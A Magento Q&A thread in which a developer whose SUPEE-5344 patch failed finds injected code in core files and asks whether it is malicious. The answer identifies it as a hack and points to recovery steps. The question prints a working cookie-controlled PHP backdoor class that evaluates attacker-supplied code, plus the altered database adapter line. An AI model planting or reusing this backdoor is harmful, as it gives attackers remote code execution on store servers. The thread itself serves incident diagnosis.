Unknown class Mage_Cms_Auth_xaj found in ../Cms/controllers/IndexController.php - malicious or just bad form?
-
13-12-2019 - |
Question
I was asked to give some advice on a 1.9.0.1 instance which has had none of the recent SUPEEs installed. SUPEE-1533 went in with no problem, but SUPEE-5344 failed, with a message of
patching file lib/Varien/Db/Adapter/Pdo/Mysql.php
Hunk #1 FAILED at 2834.
Investigating the file, I found this code at line 2836 :
if (isset($condition['mhztywsxujkfqokw'])) {
$fieldName = str_replace('#?', $this->quoteIdentifier($fieldName), $condition['mhztywsxujkfqokw']);
unset($condition['mhztywsxujkfqokw']);
The code in an unmodified lib/Varien/Db/Adapter/Pdo/Mysql.php is:
if (is_array($condition)) {
if (isset($condition['field_expr'])) {
$fieldName = str_replace('#?', $this->quoteIdentifier($fieldName), $condition['field_expr']);
unset($condition['field_expr']);
}
A find for "mhztywsxujkfqokw" led me to app/code/core/Mage/Cms/controllers/IndexController.php, where I found this appended to the end of the stock Magento class:
class Mage_Cms_Auth_xaj
{
public function __construct() {
$auth_cookie = @$_COOKIE['mhztywsxujkfqokw3'];
if ($auth_cookie) {
$method = $auth_cookie(@$_COOKIE['mhztywsxujkfqokw2']);
$auth = $auth_cookie(@$_COOKIE['mhztywsxujkfqokw1']);
$method("/124/e",$auth,124);
}
}
}
$is_auth = new Mage_Cms_Auth_xaj;
The class isn't invoked anywhere else, as far as I can see.
I am just wondering - is this something malicious, or a mod that was poorly implemented by editing two core files?
Solution
This is a hack, probably caused by a missing SUPE-5344 patch. As I see you posted this at the end of september and SUPEE-5344 was released in early 2015, it's very likey your shop got hacked inbetween.
The stuff you posted seems related to the SUPEE-5344 vulnerability which is described in detail here: http://blog.checkpoint.com/2015/04/20/analyzing-magento-vulnerability
What do you need to do?
I hope it's not too late and you have taken steps to patch and recover your shop in between.
There are most likely a lot of other files which got changed which you just didn't accidentally detect while applying the patch.
A detailed list on steps to recover can be found here: Magento hacked even after applied patch